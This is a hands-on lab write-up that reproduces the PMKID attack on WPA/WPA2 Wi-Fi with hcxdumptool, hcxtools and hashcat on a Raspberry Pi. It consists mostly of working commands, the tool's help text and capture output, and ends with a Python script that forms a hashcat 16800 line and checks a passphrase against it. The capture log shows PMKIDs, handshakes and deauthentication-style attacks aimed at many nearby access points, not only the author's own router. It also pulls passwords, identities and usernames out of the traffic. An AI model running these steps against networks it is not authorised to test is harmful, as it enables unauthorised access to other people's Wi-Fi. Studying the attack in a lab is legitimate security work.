Having heard about the new attack on WPA/WPA2 using PMKID, I am attempting to reproduce it.
Prerequisite
I am using a Raspberry Pi with an Alfa wireless card. The AP is a TP-Link N600.
Set up
The first thing I did was clone the repos needed for this attack.
Tools
Clone Hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool.git
Set up
cd hcxdumptool/
make
sudo make install
Clone Hcxtools
git clone https://github.com/ZerBea/hcxtools.git
Set up
cd hcxtools/
sudo apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
make
sudo make install
Clone Hashcat
git clone https://github.com/hashcat/hashcat.git
Or
note: this did not seem to work on the Pi; on the Pi the package was hashcat-data
sudo apt install hashcat
Attack
I started as in the write-up.
yojimbo@system76:~/lab/oscp/hcxtools$ sudo hcxdumptool -o test.pcapng -i wlan0mon --enable_status
hcxdumptool: option '--enable_status' requires an argument
invalid argument specified
This is a little annoying.
Taking a guess here, but enable_status seems like a yes-or-no kind of thing, so I tried the following.
yojimbo@system76:~/lab/oscp/hcxtools$ sudo hcxdumptool -o test.pcapng -i wlan0mon --enable_status true
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc2337c1adb (client)
MAC ACCESS POINT.........: 002067c2943f (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65253
ANONCE...................: dcd78685e6279f9e9b1d1c391b93d59470186e77efde4b1c54853634a4bb4701
Cool! Now this is what I expected to see.
The documentation says that I should see "FOUND PMKID" if the AP supports it, and that it might take a while:
We recommend running hcxdumptool up to 10 minutes before aborting.
Ran again
yojimbo@system76:~/lab/oscp$ sudo hcxdumptool -i wlan0mon -o test.pcapng --enable_status true
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233a369c4 (client)
MAC ACCESS POINT.........: 3cb87ae4ab08 (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 63761
ANONCE...................: 04a1fee32ae5ceeb4e944631c12bf25d95a465615995018c769f19c373f07577
Here I noticed the MAC ACCESS POINT has changed. There must be a way to set the AP MAC.
yojimbo@system76:~$ sudo hcxdumptool --help
hcxdumptool 4.2.1 (C) 2018 ZeroBeat
usage : hcxdumptool <options>
example: hcxdumptool -o output.pcapng -i wlp39s0f3u4u5 -t 5 --enable_status
options:
-i <interface> : interface (monitor mode must be enabled)
ip link set <interface> down
iw dev <interface> set type monitor
ip link set <interface> up
-o <dump file> : output file in pcapngformat
management frames and EAP/EAPOL frames
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-O <dump file> : output file in pcapngformat
unencrypted IPv4 and IPv6 frames
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-W <dump file> : output file in pcapngformat
encrypted WEP frames
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-c <digit> : set scanlist (1,2,3,...)
default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12
maximum entries: 127
allowed channels:
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
34, 36, 38, 40, 42, 44, 46, 48, 52, 56, 58, 60, 62, 64
100, 104, 108, 112, 116, 120, 124, 128, 132,
136, 140, 144, 147, 149, 151, 153, 155, 157
161, 165, 167, 169, 184, 188, 192, 196, 200, 204, 208, 212, 216
-t <seconds> : stay time on channel before hopping to the next channel
default: 5 seconds
-E <digit> : EAPOL timeout
default: 150000 = 1 second
value depends on channel assignment
-D <digit> : deauthentication interval
default: 10 (every 10 beacons)
the target beacon interval is used as trigger
-A <digit> : ap attack interval
default: 10 (every 10 beacons)
the target beacon interval is used as trigger
-I : show suitable wlan interfaces and quit
-h : show this help
-v : show version
--filterlist=<file> : mac filter list
format: 112233445566 + comment
maximum line lenght 128, maximum entries 32
--filtermode=<digit> : mode for filter list
1: use filter list as protection list (default)
2: use filter list as target list
--disable_active_scan : do not transmit proberequests to BROADCAST using a BROADCAST ESSID
do not transmit BROADCAST beacons
affected: ap-less and client-less attacks
--disable_deauthentications : disable transmitting deauthentications
affected: connections between client an access point
deauthentication attacks will not work against protected management frames
--give_up_deauthentications=<digit>: disable transmitting deauthentications after n tries
default: 100 tries (minimum: 4)
affected: connections between client an access point
deauthentication attacks will not work against protected management frames
--disable_disassociations : disable transmitting disassociations
affected: retry (EAPOL 4/4 - M4) attack
--disable_ap_attacks : disable attacks on single access points
affected: client-less (PMKID) attack
--give_up_ap_attacks=<digit> : disable transmitting directed proberequests after n tries
default: 100 tries (minimum: 4)
affected: client-less attack
deauthentication attacks will not work against protected management frames
--disable_client_attacks : disable attacks on single clients
affected: ap-less (EAPOL 2/4 - M2) attack
--do_rcascan : show radio channel assignment (scan for target access points)
you should disable auto scrolling in your terminal settings
--save_rcascan=<file> : output rca scan list to file when hcxdumptool terminated
--save_rcascan_raw=<file> : output file in pcapngformat
unfiltered packets
including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
--enable_status=<digit> : enable status messages
bitmask:
1: EAPOL
2: PROBEREQUEST/PROBERESPONSE
4: AUTHENTICATON
8: ASSOCIATION
--help : show this help
--version : show version
I figured it out
pi@raspberrypi:~ $ sudo hcxdumptool -i wlan0mon -o test.pcapng --enable_status 1
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc23344943a (client)
MAC ACCESS POINT.........: 00182555bc46 (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65152
ANONCE...................: e635323d909d8b276972d7c679395d5e088b0c2fe9068f660d75c53699477980
[20:32:34 - 001] ac5d10006b96 -> 000d4ba0fbfd [FOUND PMKID]
[20:32:34 - 001] ac5d10006b96 -> 000d4ba0fbfd [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 24559]
[20:32:35 - 001] 40b03473c8e0 -> 346b4648bc2a [EAPOL 4/4 - M4 RETRY ATTACK]
[20:32:35 - 001] b42a0e0f488b -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:32:37 - 001] 289efc618a66 -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:32:37 - 001] 1cc63c1d9277 -> 28187849d4fd [FOUND PMKID]
[20:32:48 - 005] 90489aeae9a3 -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:32:59 - 011] f82c182e4816 -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:33:03 - 011] 94c1500c0e9e -> 2c3068e4dba1 [FOUND PMKID]
[20:33:03 - 011] 94c1500c0e9e -> 2c3068e4dba1 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 21588]
[20:33:21 - 006] 9c3dcf96791b -> 88dea96707e5 [FOUND PMKID]
[20:33:21 - 006] 9c3dcf96791b -> 6837e9903faa [FOUND PMKID]
[20:33:21 - 006] 9c3dcf96791b -> 88dea96707e5 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 13277]
[20:33:22 - 006] 1c1b68790ed0 -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:33:23 - 006] 14edbbb260fa -> fcc23344943a [FOUND PMKID CLIENT-LESS]
[20:33:24 - 006] 9c3dcf96791b -> fcc23344943a [FOUND PMKID CLIENT-LESS]
pi@raspberrypi:~ $ sudo hcxpcaptool -z test.16800 test.pcapng
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: armv6l
file os information..........: Linux 4.14.52+
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 4644
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 8
probe responses..............: 24
association requests.........: 857
association responses........: 1723
reassociation requests.......: 2
reassociation responses......: 1
authentications (OPEN SYSTEM): 1255
authentications (BROADCOM)...: 1255
EAPOL packets................: 756
EAPOL PMKIDs.................: 13
best handshakes..............: 6 (ap-less: 1)
13 PMKID(s) written to test.16800
Note: While not required, it is recommended to use the options -E, -I and -U with hcxpcaptool. We can use these files to feed hashcat. They typically produce good results.
-E retrieve possible passwords from WiFi-traffic (additionally, this list will include ESSIDs)
-I retrieve identities from WiFi-traffic
-U retrieve usernames from WiFi-traffic
pi@raspberrypi:~ $ sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: armv6l
file os information..........: Linux 4.14.52+
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 4644
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 8
probe responses..............: 24
association requests.........: 857
association responses........: 1723
reassociation requests.......: 2
reassociation responses......: 1
authentications (OPEN SYSTEM): 1255
authentications (BROADCOM)...: 1255
EAPOL packets................: 756
EAPOL PMKIDs.................: 13
best handshakes..............: 6 (ap-less: 1)
13 PMKID(s) written to test.16800
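To see what the test.16800 file actually contains and why a PMKID alone is enough for hashcat, here is an added example (my own code, not part of this write-up, hcxtools or hashcat). It builds a hashcat -m 16800 line from constructed sample values (ESSID, passphrase and locally administered MACs that are not from the capture above), parses it back the way hcxpcaptool -z writes it, and verifies a single passphrase against the PMKID using the standard derivation PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32) and PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA). This is useful for checking that a line captured from your own AP corresponds to your own PSK.

```python
import hashlib
import hmac

# Constructed sample values for this example (not taken from the capture above).
SAMPLE_ESSID = "labnet"
SAMPLE_PASSPHRASE = "correct horse battery"
SAMPLE_AP_MAC = "020000000001"   # made-up, locally administered MACs
SAMPLE_STA_MAC = "020000000002"

def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def pmkid_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def make_16800_line(pmkid: bytes, ap_mac: str, sta_mac: str, essid: str) -> str:
    """One hashcat -m 16800 line: PMKID*MAC_AP*MAC_STA*ESSID(hex), all lowercase hex."""
    return "*".join([pmkid.hex(), ap_mac, sta_mac, essid.encode().hex()])

def parse_16800_line(line: str) -> dict:
    """Parse a line as written by hcxpcaptool -z; malformed lines are rejected."""
    parts = line.strip().split("*")
    if len(parts) != 4 or len(parts[0]) != 32 or len(parts[1]) != 12 or len(parts[2]) != 12:
        raise ValueError("not a well-formed 16800 line: %r" % line)
    return {"pmkid": bytes.fromhex(parts[0]), "ap_mac": bytes.fromhex(parts[1]),
            "sta_mac": bytes.fromhex(parts[2]), "essid": bytes.fromhex(parts[3]).decode()}

def passphrase_matches(line: str, passphrase: str) -> bool:
    """True if the passphrase reproduces the PMKID in the line; this is the per-candidate
    check hashcat performs, and no handshake with a client is needed for it."""
    h = parse_16800_line(line)
    pmk = pmk_from_passphrase(passphrase, h["essid"])
    return hmac.compare_digest(pmkid_from_pmk(pmk, h["ap_mac"], h["sta_mac"]), h["pmkid"])

def sample_line() -> str:
    """A 16800 line derived from the constructed values, as an AP with that PSK would produce."""
    pmk = pmk_from_passphrase(SAMPLE_PASSPHRASE, SAMPLE_ESSID)
    tag = pmkid_from_pmk(pmk, bytes.fromhex(SAMPLE_AP_MAC), bytes.fromhex(SAMPLE_STA_MAC))
    return make_16800_line(tag, SAMPLE_AP_MAC, SAMPLE_STA_MAC, SAMPLE_ESSID)

if __name__ == "__main__":
    line = sample_line()
    print(line)
    print("matches:", passphrase_matches(line, SAMPLE_PASSPHRASE))      # True
    print("wrong key:", passphrase_matches(line, "not the passphrase"))  # False
```

The expensive step is the 4096-round PBKDF2 per candidate, which is exactly why a long, non-dictionary PSK is the mitigation on the AP side.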